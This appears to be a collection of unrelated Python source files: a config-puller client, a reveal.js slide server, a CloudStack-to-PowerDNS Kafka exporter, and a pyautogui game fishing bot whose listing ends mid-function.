if th.name.startswith("http"):
th.join()
def json_loads(resp: Optional[Response]) -> Any:
"""Attempts to load json the result of a response
Args:
resp (Optional[Response]): The Response object
Raises:
JIRAError: via :py:func:`jira.resilientsession.raise_on_error`
Returns:
Union[List[Dict[str, Any]], Dict[str, Any]]: the json
"""
raise_on_error(resp) # if 'resp' is None, will raise an error here
resp = cast(Response, resp) # tell mypy only Response-like are here
try:
return resp.json()
except ValueError:
# json.loads() fails with empty bodies
if not resp.text:
return {}
raise
|
client.py
|
import os
import json
import urlparse
import threading
import requests
import time
from collections import deque
import version
class Item:
def __init__(self, org, proj, name, value, token, version, gray, timeout):
self._org = org
self._proj = proj
self._name = name
self._value = value
self._token = token
self._version = version
self._gray = gray
self._timeout = time.time() + timeout
def __str__(self):
t = {}
t['org'] = self._org
t['proj'] = self._proj
t['name'] = self._name
t['value'] = self._value
t['token'] = self._token
t['version'] = self._version
t['gray'] = self._gray
t['timeout'] = self._timeout
return json.dumps(t)
__repr__ = __str__
def rid(self):
return self._org + "." + self._proj + "." + self._name
def org(self):
return self._org
def proj(self):
return self._proj
def name(self):
return self._name
def token(self):
return self._token
def version(self):
return self._version
def value(self):
return self._value
def gray(self):
return self._gray
def timeout(self):
return self._timeout
def set_expired(self, timeout):
self._timeout = timeout
def expired(self):
return self._timeout <= time.time()
class Cache:
def __init__(self, async=False):
self._cache = {}
self._timeouts = []
self._lock = threading.Lock()
self._async = async
def get(self, key):
with self._lock:
if self._cache.has_key(key):
return self._cache[key]
return None
def set(self, key, item):
with self._lock:
self._cache[key] = item
if self._async:
self._timeouts.append((key, item.timeout()))
def remove(self, key):
with self._lock:
if self._cache.has_key(key):
del self._cache[key]
def refresh(self, key, timeout):
expired = time.time() + timeout
with self._lock:
if self._cache.has_key(key):
self._cache[key].set_expired(expired)
if self._async:
self._timeouts.append((key, expired))
def get_update_items(self):
t = []
with self._lock:
t.extend(self._timeouts)
self._timeouts = []
return t
def gen_cache_id(rid, token, gray):
if token != None:
rid = rid + ":" + token
if gray:
rid = rid + ":true"
return rid
class Result(object):
def __init__(self, code=-1, version="-1", content=None):
self._code = code
self._version = version
self._content = content
def __str__(self):
t = {}
t['code'] = self._code
t['version'] = self._version
t['content'] = self._content
return json.dumps(t)
__repr__ = __str__
def set_code(self, code):
self._code = code
def set_version(self, version):
self._version = version
def set_content(self, content):
self._content = content
def ok(self):
return self._code == 200
def code(self):
return self._code
def version(self):
return self._version
def content(self):
return self._content
class Client(object):
__instance_lock = threading.Lock()
__instance = None
def __init__(self, address, timeout=1, auto_refresh=False, refresh_interval=10):
self._callbacks = {}
self._callbacks_lock = threading.Lock()
self._address = address
if not self._address.endswith("/"):
self._address = self._address + "/api/puller/"
else:
self._address = self._address + "api/puller/"
self._timeout = timeout
self._cache = Cache(auto_refresh)
self._role = "client"
self._refresh_interval = refresh_interval
self._auto_refresh = auto_refresh
self._printer = None
if auto_refresh:
background = threading.Thread(target=self._bgwork)
background.setName("guldan-bg")
background.setDaemon(True)
self._background = background
background.start()
@classmethod
def instance(cls, address, timeout=1, auto_refresh=False):
if not cls.__instance:
with cls.__instance_lock:
if not cls.__instance:
cls.__instance = cls(address, timeout, auto_refresh)
return cls.__instance
def _get_callback(self, cache_id):
with self._callbacks_lock:
if self._callbacks.has_key(cache_id):
return self._callbacks[cache_id]
return None
def subscribe(self, rid, callback, token=None, gray=False):
with self._callbacks_lock:
self._callbacks[gen_cache_id(rid, token, gray)] = callback
def _bgwork(self):
while True:
time.sleep(self._refresh_interval)
expires = self._cache.get_update_items()
if len(expires) > 0:
idx = 0
while idx < len(expires):
while idx < len(expires):
expire = expires[idx]
if expire[1] > time.time():
break
cache_id = expire[0]
local_item = self._cache.get(cache_id)
if local_item == None:
idx = idx + 1
continue
result = self._get_config_from_remote(local_item.org(), local_item.proj(),
local_item.name(), local_item.token(), local_item.version(), local_item.gray())
code = result.code()
if code == 200:
if local_item == None or local_item.version() != result.version():
if self._try_do_callback(cache_id, result):
item = Item(local_item.org(), local_item.proj(), local_item.name(),
result.content(), local_item.token(), result.version(), local_item.gray(), self._refresh_interval)
self._cache.set(cache_id, item)
else:
self._cache.refresh(cache_id, self._refresh_interval)
elif code == 404 or code == 403:
if self._try_do_callback(cache_id, result):
self._cache.remove(cache_id)
else:
self._cache.refresh(cache_id, self._refresh_interval)
idx = idx + 1
time.sleep(self._refresh_interval)
def _try_do_callback(self, cache_id, result):
callback = self._get_callback(cache_id)
if callback != None and callback(cache_id, result) == False:
self._cache.refresh(cache_id, self._refresh_interval)
return False
return True
def _get_config_from_remote(self, org, proj, name, token, local_version, gray):
result = Result()
payload = {}
payload["grey"] = gray
payload["cver"] = "python"+version.__version__
payload["ctype"] = self._role
payload["lver"] = local_version
payload["cid"] = os.getpid()
headers = None
if token != None:
headers = {"X-Guldan-Token": token}
try:
address = self._address + org + "/" + proj + "/" + name
r = requests.get(address, params=payload, timeout=self._timeout, headers=headers)
if r.status_code == requests.codes.ok:
result.set_code(r.status_code)
result.set_version(r.headers["X-Guldan-Version"])
result.set_content(r.text)
elif r.status_code == 404 or r.status_code == 403:
result.set_code(r.status_code)
else:
if self._printer:
self._printer("request %s got error code %d" % (address, r.status_code))
except Exception, e:
if self._printer:
self._printer("request %s got error %s" % str(e))
return result
def get_config(self, rid, token=None, gray=False):
slices = None
try:
slices = rid.split(".")
if len(slices) != 3:
raise ValueError("rid:" + rid + " is invalid format")
except AttributeError:
raise ValueError("rid is invalid type")
cache_id = gen_cache_id(rid, token, gray)
local_item = self._cache.get(cache_id)
if local_item != None and (self._auto_refresh or local_item.expired() == False):
return Result(200, local_item.version(), local_item.value())
v = "-1"
if local_item != None:
v = local_item.version()
result = self._get_config_from_remote(slices[0], slices[1], slices[2], token, v, gray)
code = result.code()
if code == 200:
if local_item == None or local_item.version() != result.version():
item = Item(slices[0], slices[1], slices[2], result.content(), token, result.version(), gray, self._refresh_interval)
self._cache.set(cache_id, item)
else:
self._cache.refresh(cache_id, self._refresh_interval)
elif code == 404 or code == 403:
self._cache.remove(cache_id)
return result
|
serve.py
|
"""PostProcessor for serving reveal.js HTML slideshows."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import print_function
import os
import webbrowser
import threading
from tornado import web, ioloop, httpserver, log
from tornado.httpclient import AsyncHTTPClient
from traitlets import Bool, Unicode, Int
from .base import PostProcessorBase
class ProxyHandler(web.RequestHandler):
"""handler the proxies requests from a local prefix to a CDN"""
@web.asynchronous
def get(self, prefix, url):
"""proxy a request to a CDN"""
proxy_url = "/".join([self.settings['cdn'], url])
client = self.settings['client']
client.fetch(proxy_url, callback=self.finish_get)
def finish_get(self, response):
"""finish the request"""
# rethrow errors
response.rethrow()
for header in ["Content-Type", "Cache-Control", "Date", "Last-Modified", "Expires"]:
if header in response.headers:
self.set_header(header, response.headers[header])
self.finish(response.body)
class ServePostProcessor(PostProcessorBase):
"""Post processor designed to serve files
Proxies reveal.js requests to a CDN if no local reveal.js is present
"""
open_in_browser = Bool(True,
help="""Should the browser be opened automatically?"""
).tag(config=True)
browser = Unicode(u'',
help="""Specify what browser should be used to open slides. See
https://docs.python.org/3/library/webbrowser.html#webbrowser.register
to see how keys are mapped to browser executables. If
not specified, the default browser will be determined
by the `webbrowser`
standard library module, which allows setting of the BROWSER
environment variable to override it.
""").tag(config=True)
reveal_cdn = Unicode("https://cdnjs.cloudflare.com/ajax/libs/reveal.js/3.5.0",
help="""URL for reveal.js CDN.""").tag(config=True)
reveal_prefix = Unicode("reveal.js",
help="URL prefix for reveal.js").tag(config=True)
ip = Unicode("127.0.0.1",
help="The IP address to listen on.").tag(config=True)
port = Int(8000, help="port for the server to listen on.").tag(config=True)
def postprocess(self, input):
"""Serve the build directory with a webserver."""
dirname, filename = os.path.split(input)
handlers = [
(r"/(.+)", web.StaticFileHandler, {'path' : dirname}),
(r"/", web.RedirectHandler, {"url": "/%s" % filename})
]
if ('://' in self.reveal_prefix or self.reveal_prefix.startswith("//")):
# reveal specifically from CDN, nothing to do
pass
elif os.path.isdir(os.path.join(dirname, self.reveal_prefix)):
# reveal prefix exists
self.log.info("Serving local %s", self.reveal_prefix)
else:
self.log.info("Redirecting %s requests to %s", self.reveal_prefix, self.reveal_cdn)
handlers.insert(0, (r"/(%s)/(.*)" % self.reveal_prefix, ProxyHandler))
app = web.Application(handlers,
cdn=self.reveal_cdn,
client=AsyncHTTPClient(),
)
# hook up tornado logging to our logger
log.app_log = self.log
http_server = httpserver.HTTPServer(app)
http_server.listen(self.port, address=self.ip)
url = "http://%s:%i/%s" % (self.ip, self.port, filename)
print("Serving your slides at %s" % url)
print("Use Control-C to stop this server")
if self.open_in_browser:
try:
browser = webbrowser.get(self.browser or None)
b = lambda: browser.open(url, new=2)
threading.Thread(target=b).start()
except webbrowser.Error as e:
self.log.warning('No web browser found: %s.' % e)
browser = None
try:
ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
print("\nInterrupted")
def main(path):
"""allow running this module to serve the slides"""
server = ServePostProcessor()
server(path)
if __name__ == '__main__':
import sys
main(sys.argv[1])
|
exporter.py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import sys
sys.path.append(".")
import logging
import json
import os
from signal import SIGKILL
from kafka import KafkaConsumer, TopicPartition
from multiprocessing import Process
from multiprocessing import Queue
from Queue import Empty
import mysql.connector
from cs import CloudStack, CloudStackException
from lib.virtual_machine import VirtualMachine
from lib.account import Account
FORMAT = '%(asctime)-15s %(message)s'
logging.basicConfig(format=FORMAT, stream=sys.stderr, level=logging.INFO)
kafka_bootstrap_hosts = os.environ["KAFKA_BOOTSTRAP"]
kafka_topic = os.environ["KAFKA_TOPIC"]
kafka_group = os.environ["KAFKA_GROUP"]
mysql_pdns_name = os.environ['MYSQL_PDNS_NAME']
mysql_pdns_user = os.environ['MYSQL_PDNS_USER']
mysql_pdns_password = os.environ['MYSQL_PDNS_PASSWORD']
mysql_pdns_host = os.environ['MYSQL_PDNS_HOST']
mysql_pdns_port = int(os.environ['MYSQL_PDNS_PORT'])
cs_endpoint = os.environ['CS_ENDPOINT']
cs_api_key = os.environ['CS_API_KEY']
cs_secret_key = os.environ['CS_SECRET_KEY']
dns_record_ttl = os.environ['DNS_RECORD_TTL']
dns_common_zone = os.environ['DNS_COMMON_ZONE']
dns_add_to_common_zone = os.environ['DNS_ADD_TO_COMMON_ZONE']
deadlock_interval = os.environ['DEADLOCK_INTERVAL']
def get_mysql():
return mysql.connector.connect(host=mysql_pdns_host, port=mysql_pdns_port,
user=mysql_pdns_user, passwd=mysql_pdns_password, database=mysql_pdns_name)
pdns_conn = get_mysql()
pdns_cursor = pdns_conn.cursor()
pdns_cursor.execute(
"CREATE TABLE IF NOT EXISTS cs_mapping(uuid CHAR(36), record VARCHAR(255), ipaddress CHAR(39), "
"UNIQUE(uuid, record, ipaddress))")
pdns_conn.commit()
pdns_cursor.close()
pdns_conn.close()
consumer = KafkaConsumer(kafka_topic,
auto_offset_reset='earliest',
group_id=kafka_group,
bootstrap_servers=kafka_bootstrap_hosts.split(","),
value_deserializer=lambda m: json.loads(m.decode('utf8')),
enable_auto_commit=False)
cs = CloudStack(endpoint=cs_endpoint,
key=cs_api_key,
secret=cs_secret_key)
def extract_create_payload(job_result):
job_result = job_result.replace("org.apache.cloudstack.api.response.UserVmResponse/virtualmachine/", "", 1)
return json.loads(job_result)
def update_a_zone(cursor, account, vm, domain):
cursor.execute("SELECT id FROM domains WHERE name = %s", (domain,))
fqdn = vm.name + "." + domain
row = cursor.fetchone()
if row is not None:
domain_id = row[0]
cursor.execute(
"""REPLACE INTO records (name, type, content, ttl, prio, change_date, ordername, auth, domain_id)
VALUES (%s, 'A', %s, %s, 0, UNIX_TIMESTAMP(), %s, 1, %s)""",
(fqdn, vm.ip4, dns_record_ttl, vm.name, domain_id))
if vm.ip6 is not None:
cursor.execute(
"""REPLACE INTO records (name, type, content, ttl, prio, change_date, ordername, auth, domain_id)
VALUES (%s, 'AAAA', %s, %s, 0, UNIX_TIMESTAMP(), %s, 1, %s)""",
(fqdn, vm.ip6, dns_record_ttl, vm.name, domain_id))
cursor.execute("""INSERT IGNORE INTO cs_mapping (uuid, record) VALUES(%s,%s)""", (vm.uuid, fqdn))
group_fqdn = vm.group_fqdn(account, domain)
if group_fqdn:
logging.info("Group FQDN: %s" % group_fqdn)
cursor.execute(
"""REPLACE INTO records (name, type, content, ttl, prio, change_date, ordername, auth, domain_id)
VALUES (%s, 'A', %s, %s, 0, UNIX_TIMESTAMP(), %s, 1, %s)""",
(group_fqdn, vm.ip4, dns_record_ttl, vm.name, domain_id))
cursor.execute("""INSERT IGNORE INTO cs_mapping (uuid, record, ipaddress) VALUES (%s,%s,%s)""",
(vm.uuid, group_fqdn, vm.ip4))
if vm.ip6 is not None:
cursor.execute(
"""REPLACE INTO records (name, type, content, ttl, prio, change_date, ordername, auth, domain_id)
VALUES (%s, 'AAAA', %s, %s, 0, UNIX_TIMESTAMP(), %s, 1, %s)""",
(group_fqdn, vm.ip6, dns_record_ttl, vm.name, domain_id))
cursor.execute("""INSERT IGNORE INTO cs_mapping (uuid, record, ipaddress) VALUES (%s,%s,%s)""",
(vm.uuid, group_fqdn, vm.ip6))
def update_ptr_zone(cursor, vm):
cursor.execute("SELECT id FROM domains WHERE name = %s", (vm.ip4_ptr_zone,))
row = cursor.fetchone()
if row is not None:
domain_id = row[0]
cursor.execute(
"""REPLACE INTO records (name, type, content, ttl, prio, change_date, auth, domain_id)
VALUES (%s, 'PTR', %s, %s, 0, UNIX_TIMESTAMP(), 1, %s)""",
(vm.ip4_ptr, vm.fqdn, dns_record_ttl, domain_id))
cursor.execute("""INSERT IGNORE INTO cs_mapping (uuid, record) VALUES(%s,%s)""", (vm.uuid, vm.ip4_ptr))
if vm.ip6 is not None:
cursor.execute("SELECT id FROM domains WHERE name = %s", (vm.ip6_ptr_zone,))
row = cursor.fetchone()
if row is not None:
domain_id = row[0]
cursor.execute(
"""REPLACE INTO records (name, type, content, ttl, prio, change_date, auth, domain_id)
VALUES (%s, 'PTR', %s, %s, 0, UNIX_TIMESTAMP(), 1, %s)""",
(vm.ip6_ptr, vm.fqdn, dns_record_ttl, domain_id))
cursor.execute("""INSERT IGNORE INTO cs_mapping (uuid, record) VALUES(%s,%s)""", (vm.uuid, vm.ip6_ptr))
def create_new_records(m):
jr = "jobResult"
def create_match():
return "commandEventType" in m \
and "status" in m \
and m["commandEventType"].lower() == "VM.CREATE".lower() \
and m["status"].lower() == "SUCCEEDED".lower()
def start_match():
return "commandEventType" in m \
and "status" in m \
and m["commandEventType"].lower() == "VM.START".lower() \
and m["status"].lower() == "SUCCEEDED".lower()
is_create_event = create_match()
is_start_event = start_match()
if is_create_event or is_start_event:
account = Account(
cs_api=cs,
cmd_info=m)
job_result = extract_create_payload(m[jr])
vm = VirtualMachine(
cs_api=cs,
vm_info=job_result)
if not (vm.domain and vm.ip4):
return
vm.dump()
c = pdns_conn.cursor()
# delete old a records
c.execute("DELETE FROM records WHERE name = %s", (vm.fqdn,))
# Add A, AAAA records
if dns_add_to_common_zone == 'true':
update_a_zone(c, account, vm, dns_common_zone)
if account.network_domain:
update_a_zone(c, account, vm, account.network_domain)
else:
update_a_zone(c, account, vm, vm.domain)
# Add PTR records, except when VM is started
if not is_start_event:
update_ptr_zone(c, vm)
pdns_conn.commit()
c.close()
def delete_removed_records(m):
vm_field = "VirtualMachine"
status_field = "status"
status_value = "Completed"
event_field = "event"
event_value = "VM.DESTROY"
if vm_field in m \
and status_field in m \
and event_field in m \
and m[status_field].lower() == status_value.lower() \
and m[event_field].lower() == event_value.lower():
vm_uuid = m[vm_field].lower()
c = pdns_conn.cursor()
c.execute("SELECT record, ipaddress FROM cs_mapping where uuid = %s", (vm_uuid,))
rows = c.fetchall()
for r in rows:
logging.info("Deleting DNS entries: record=%s, ipaddress=%s" % r)
if r[1]:
c.execute("DELETE FROM records WHERE name = %s AND content = %s", r)
else:
c.execute("DELETE FROM records WHERE name = %s", (r[0],))
c.execute("DELETE FROM cs_mapping WHERE uuid = %s", (vm_uuid,))
pdns_conn.commit()
c.close()
def monitor(q, pid):
while True:
try:
q.get(timeout=int(deadlock_interval))
except Empty:
break
logging.info("No events in %s seconds. May be internal deadlock happened. Reset the system." % deadlock_interval)
os.kill(pid, SIGKILL)
exit(0)
if __name__ == '__main__':
q = Queue()
pid = os.getpid()
mon = Process(target=monitor, args=(q, pid))
mon.start()
while True:
msgs = consumer.poll(1000, 10)
if bool(msgs):
msgs = msgs[TopicPartition(topic=kafka_topic, partition=0)]
for m in msgs:
m = m.value
try:
pdns_conn = get_mysql()
create_new_records(m)
delete_removed_records(m)
pdns_conn.close()
consumer.commit()
except CloudStackException:
pass
q.put(m)
|
Fisherman.py
|
import sys
from typing import Set
import pyautogui, pyaudio, audioop, threading, time, win32api, configparser, mss, mss.tools, cv2, numpy
from dearpygui.core import *
from dearpygui.simple import *
import random, os
from datetime import datetime
# Loads Settings
parser = configparser.ConfigParser()
try:
parser.read("settings.ini")
except:
print("not exist!")
debugmode = parser.getboolean("Settings", "debug")
resolution = parser.getint("Settings", "game_resolution")
max_volume = parser.getint("Settings", "Volume_Threshold")
screen_area = parser.get("Settings", "tracking_zone")
coord_bait = parser.get("Settings", "bait_inventory")
coord_food = parser.get("Settings", "food_inventory")
detection_threshold = parser.getfloat("Settings", "detection_threshold")
last_food_time = parser.get("Settings", "last_food_time")
dist_launch_time1 = parser.getfloat("Settings", "launch_time1")
dist_launch_time2 = parser.getfloat("Settings", "launch_time2")
dist_launch_time3 = parser.getfloat("Settings", "launch_time3")
dist_launch_time4 = parser.getfloat("Settings", "launch_time4")
cast_time = parser.getint("Settings", "cast_time")
screen_area = screen_area.strip("(")
screen_area = screen_area.strip(")")
cordies = screen_area.split(",")
screen_area = int(cordies[0]), int(cordies[1]), int(cordies[2]), int(cordies[3])
bobber_img = ("bobber-1024-768.png", "bobber-1280x720.png", "bobber-1600x1024.png")
# print(bobber_img[0])
# screen_area = x1,y1,x2,y2
# resolution game
resolutions = ["1024x768", "1080x720", "1600x1024"]
# Coords for fishing spots
coords = []
# print(coord_bait)
coord_bait = coord_bait.strip("(")
coord_bait = coord_bait.strip(")")
# (coord_bait)
xy_bait = coord_bait.split(",")
coord_bait = int(xy_bait[0]), int(xy_bait[1])
# print(coord_food)
coord_food = coord_food.strip("(")
coord_food = coord_food.strip(")")
# (coord_food)
xy_food = coord_food.split(",")
coord_food = int(xy_food[0]), int(xy_food[1])
# Sound Volume
total = 0
# Current Bot State
STATE = "IDLE"
# Thread Stopper
stop_button = False
# Stuff for mouse events
state_left = win32api.GetKeyState(0x01)
state_right = win32api.GetKeyState(0x02)
# fish counters
fish_count = 0
bait_counter = 0
food_bait = 0
food_used = 0
##########################################################
#
# These Functions handle bot state / minigame handling
#
##########################################################
# Scans the current input volume
def check_volume():
global total, STATE, max_volume, stop_button
p = pyaudio.PyAudio()
stream = p.open(
format=pyaudio.paInt16,
channels=2,
rate=44100,
input=True,
frames_per_buffer=1024,
)
current_section = 0
while 1:
if stop_button == False:
total = 0
for i in range(0, 2):
data = stream.read(1024)
if True:
reading = audioop.max(data, 2)
total = total + reading
if (
total > max_volume
and STATE != "SOLVING"
and STATE != "DELAY"
and STATE != "CASTING"
):
do_minigame()
else:
break
def get_new_spot():
return random.choice(coords)
# Runs the casting function
def cast_hook():
global STATE, stop_button
while 1:
if stop_button == False:
if STATE == "CASTING" or STATE == "STARTED":
time.sleep(2.6)
pyautogui.mouseUp()
x, y, n = get_new_spot()
pyautogui.moveTo(x, y, tween=pyautogui.linear, duration=0.2)
time.sleep(0.7)
log_info(f"Casted towards:{x,y}", logger="Information")
pyautogui.mouseDown()
if n == 1:
time.sleep(
random.uniform(dist_launch_time1 - 0.2, dist_launch_time1)
)
elif n == 2:
time.sleep(
random.uniform(dist_launch_time2 - 0.2, dist_launch_time2)
)
elif n == 3:
time.sleep(
random.uniform(dist_launch_time3 - 0.2, dist_launch_time3)
)
elif n == 4:
time.sleep(
random.uniform(dist_launch_time4 - 0.2, dist_launch_time4)
)
pyautogui.mouseUp()
time.sleep(2.5)
STATE = "CAST"
elif STATE == "CAST":
time.sleep(cast_time)
if STATE == "CAST":
log_warning(
f"Seems to be stuck on cast. Recasting", logger="Information"
)
pyautogui.press("r")
time.sleep(0.25)
pyautogui.click(clicks=2, interval=0.15)
time.sleep(0.25)
STATE = "CASTING"
cast_hook()
else:
break
# Uses obj detection with OpenCV to find and track bobbers left / right coords
def do_minigame():
global STATE, fish_count, bait_counter
if STATE != "CASTING" and STATE != "STARTED":
STATE = "SOLVING"
log_debug(f"Attempting Minigame", logger="Information")
pyautogui.mouseDown()
pyautogui.mouseUp()
# Initial scan. Waits for bobber to appear
time.sleep(0.25)
valid, location, size = Detect_Bobber()
if valid == "TRUE":
fish_count += 1
bait_counter += 1
while 1:
valid, location, size = Detect_Bobber()
if valid == "TRUE":
if location[0] < size * 0.6:
pyautogui.mouseDown()
else:
pyautogui.mouseUp()
else:
if STATE != "CASTING":
STATE = "CASTING"
pyautogui.mouseUp()
break
else:
STATE = "CASTING"
def food_check():
global last_food_time, food_used, stop_button, STATE
while True:
if stop_button == False:
if STATE != "IDLE":
current_time = datetime.now().time().strftime("%H:%M")
x = datetime.strptime(last_food_time, "%H:%M")
y = datetime.strptime(current_time, "%H:%M")
diff_time = (y - x).total_seconds() / 60.0
if diff_time > 30:
log_info(f"Using Food!. Time: {current_time}", logger="Information")
pyautogui.press("2")
time.sleep(0.3)
food_used += 1
last_food_time = current_time
fp = open("settings.ini")
p = configparser.ConfigParser()
p.read_file(fp)
p.set("Settings", "last_food_time", str(current_time))
p.write(open(f"Settings.ini", "w"))
log_info(
f"Saved new food time to settings.ini", logger="Information"
)
if food_used == 10:
pyautogui.press("i")
x = int(coord_food[0])
y = int(coord_food[1])
pyautogui.moveTo(x, y, tween=pyautogui.linear, duration=0.2)
time.sleep(0.3)
log_info(f"Reloading food...", logger="Information")
pyautogui.click(button="right", interval=0.25)
time.sleep(0.3)
pyautogui.press("i")
food_used = 0
else:
break
##########################################################
#
# These Functions are all Callbacks used by DearPyGui
#
##########################################################
# Generates the areas used for casting
def generate_coords(sender, data):
global coords, STATE, state_left
amount_of_choords = get_value("Amount Of Spots")
for n in range(int(amount_of_choords)):
n = n + 1
temp = []
log_info(
f"[spot:{n}]|Press Spacebar over the spot you want", logger="Information"
)
time.sleep(1)
while True:
a = win32api.GetKeyState(0x20)
if a != state_left:
state_left = a
if a < 0:
break
time.sleep(0.001)
x, y = pyautogui.position()
temp.append(x)
temp.append(y)
temp.append(n)
coords.append(temp)
log_info(f"Position:{n} Saved. | {x,y}", logger="Information")
# generate location bait inventory
def bait_coords(sender, data):
global coord_bait, state_left
for n in range(1):
n = n + 1
temp = []
log_info(
f"[Bait:{n}]|Press Spacebar over the bait in inventory",
logger="Information",
)
time.sleep(1)
while True:
a = win32api.GetKeyState(0x20)
if a != state_left:
state_left = a
if a < 0:
break
time.sleep(0.001)
x, y = pyautogui.position()
coord_bait = x, y
log_info(f"Updated bait inventory to {coord_bait}", logger="Information")
def food_coords(sender, data):
global coord_food, state_left
for n in range(1):
n = n + 1
temp = []
log_info(
f"[Food:{n}]|Press Spacebar over the food in inventory",
logger="Information",
)
time.sleep(1)
while True:
a = win32api.GetKeyState(0x20)
if a != state_left:
state_left = a
if a < 0:
break
time.sleep(0.001)
x, y = pyautogui.position()
coord_food = x, y
log_info(f"Updated food inventory to {coord_food}", logger="Information")
# Sets tracking zone for image detection
def Grab_Screen(sender, data):
global screen_area
state_left = win32api.GetKeyState(0x20)
image_coords = []
log_info(
f"Please hold and drag space over tracking zone (top left to bottom right)",
logger="Information",
)
while True:
a = win32api.GetKeyState(0x20)
if a != state_left: # Button state changed
state_left = a
if a < 0:
x, y = pyautogui.position()
image_coords.append([x, y])
else:
x, y = pyautogui.position()
image_coords.append([x, y])
break
time.sleep(0.001)
start_point = image_coords[0]
end_point = image_coords[1]
screen_area = start_point[0], start_point[1], end_point[0], end_point[1]
log_info(f"Updated tracking area to {screen_area}", logger="Information")
# Detects bobber in tracking zone using openCV
def change_bober(val):
if val == 0:
return cv2.imread(bobber_img[0])
elif val == 1:
return cv2.imread(bobber_img[1])
elif val == 2:
return cv2.imread(bobber_img[2])
else:
log_info(f"Please Select Game Resolution", logger="Information")
return cv2.imread("bobber.png")
def Detect_Bobber():
global detection_threshold
start_time = time.time()
with mss.mss() as sct:
base = numpy.array(sct.grab(screen_area))
base = numpy.flip(base[:, :, :3], 2) # 1
base = cv2.cvtColor(base, cv2.COLOR_RGB2BGR)
bobber = change_bober(resolution)
bobber = numpy.array(bobber, dtype=numpy.uint8)
bobber = numpy.flip(bobber[:, :, :3], 2) # 1
bobber = cv2.cvtColor(bobber, cv2.COLOR_RGB2BGR)
result = cv2.matchTemplate(base, bobber, cv2.TM_CCOEFF_NORMED)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)
# if max_val > 0.5:
if max_val > detection_threshold:
print(f"Bobber Found!. certainty:{round(max_val,4)}")
print("%s s to calculate" % (round(time.time() - start_time, 4)))
return ["TRUE", max_loc, base.shape[1]]
else:
print(f"Bobber not found. certainty:{round(max_val,4)}")
print("%s s to calculate" % (round(time.time() - start_time, 4)))
return ["FALSE", max_loc, base.shape[1]]
# Starts the bots threads
def start(data, sender):
global max_volume, stop_button, STATE
STATE = "STARTING"
stop_button = False
volume_manager = threading.Thread(target=check_volume, name="VOLUME CHECK MANAGE")
hook_manager = threading.Thread(target=cast_hook, name="CAST HOOK MANAGE")
food_manager = threading.Thread(target=food_check, name="FOOD MANAGER")
if stop_button == False:
max_volume = get_value("Set Volume Threshold")
if len(coords) == 0:
log_info(f"Please Select Fishing Coords first", logger="Information")
return
else:
pyautogui.mouseUp()
x, y, n = get_new_spot()
pyautogui.moveTo(x, y, tween=pyautogui.linear, duration=0.2)
time.sleep(0.25)
pyautogui.mouseDown()
time.sleep(0.15)
pyautogui.mouseUp()
time.sleep(0.15)
pyautogui.press("1")
time.sleep(2.2)
food_manager.start()
log_info(f"Food Manager Started", logger="Information")
time.sleep(0.2)
volume_manager.start()
log_info(f"Volume Scanner Started", logger="Information")
hook_manager.start()
log_info(f"Hook Manager Started", logger="Information")
log_info(f"Bot Started", logger="Information")
STATE = "STARTED"
else:
log_error(f"Invalid KEY", logger="Information")
# Stops the bot and closes active threads
def stop(data, sender):
global stop_button, STATE
STATE = "STOPPING"
stop_button = True
log_info(f"Stopping Hook Manager", logger="Information")
log_info(f"Stopping Volume Scanner", logger="Information")
pyautogui.mouseUp()
STATE = "STOPPED"
coords.clear()
log_info(f"Stopped Bot. Please re-spot!", logger="Information")
# Updates Bot Volume
def save_volume(sender, data):
global max_volume
max_volume = get_value("Set Volume Threshold")
log_info(f"Max Volume Updated to :{max_volume}", logger="Information")
# Set detection threshold
def save_threshold(sender, data):
global detection_threshold
detection_threshold = get_value("Set Detection Threshold")
log_info(
f"Detection Threshold Updated to :{detection_threshold}", logger="Information"
)
# Set time launch dist
def save_dist_launch_time1(sender, data):
global dist_launch_time1
dist_launch_time1 = get_value("Set Time Launch Distance 1")
log_info(
f"Dist time 1 launch Updated to :{dist_launch_time1}", logger="Information"
)
def save_dist_launch_time2(sender, data):
global dist_launch_time2
dist_launch_time2 = get_value("Set Time Launch Distance 2")
log_info(
f"Dist time 2 launch Updated to :{dist_launch_time2}", logger="Information"
)
def save_dist_launch_time3(sender, data):
global dist_launch_time3
dist_launch_time3 = get_value("Set Time Launch Distance 3")
log_info(
f"Dist time 3 launch Updated to :{dist_launch_time3}", logger="Information"
)
def save_dist_launch_time4(sender, data):
global dist_launch_time4
dist_launch_time4 = get_value("Set Time Launch Distance 4")
log_info(
f"Dist time 4 launch Updated to :{dist_launch_time4}", logger="Information"
)
def save_cast_time(sender, data):
global cast_time
cast_time = get_value("Set Cast Time")
log_info(f"Cast time Updated to :{cast_time}", logger="Information")
# save modify resolution bobber
def save_resolution(sender, data):
global resolution
resolution = get_value("Set Game Resolution")
log_info(
f"Resolution Game Updated to :{resolutions[resolution]}", logger="Information"
)
# Title Tracking
def Setup_title():
global bait_counter
global food_bait
while 1:
set_main_window_title(
f"Fisherman | Status:{STATE} | Fish Hits:{fish_count} |Current Volume: {total} / {max_volume} |"
)
time.sleep(0.05)
if bait_counter >= 10:
bait_counter = 0
food_bait += 1
cal_bait = 10 - food_bait
log_info(f"Using Bait!. Proximaly reload: {cal_bait}", logger="Information")
pyautogui.press("1")
if food_bait == 10:
pyautogui.press("i")
x = int(coord_bait[0])
y = int(coord_bait[1])
pyautogui.moveTo(x, y, tween=pyautogui.linear, duration=0.2)
time.sleep(0.3)
log_info(f"Reloading bait...", logger="Information")
pyautogui.click(button="right", interval=0.25)
time.sleep(0.3)
pyautogui.press("i")
food_bait = 0
def Setup():
if os.path.exists("first_run.txt"):
return
else:
print("Detected first run...\nChecking Files.")
if os.path.exists("bobber.png"):
print("\U0001f44d" + " Found bobber.png")
else:
print(
"ERROR | No bobber.png found. Please obtain the bobber.png and restart."
)
exit("bobber error")
for i in bobber_img:
if os.path.exists(i):
print("\U0001f44d" + str(i))
else:
print(
"ERROR | No "
+ str(i)
+ " found. Please obtain the bobber.png and restart."
)
exit("bobber error")
if os.path.exists("settings.ini"):
print("\U0001f44d" + " Found settings.ini")
else:
print(
"ERROR | No settings.ini found. Please obtain the settings file and restart."
)
exit("settings error")
f = open("first_run.txt", "w")
f.write("ran = true")
f.close()
# Saves settings to settings.ini
def save_settings(sender, data):
fp = open("settings.ini")
p = configparser.ConfigParser()
p.read_file(fp)
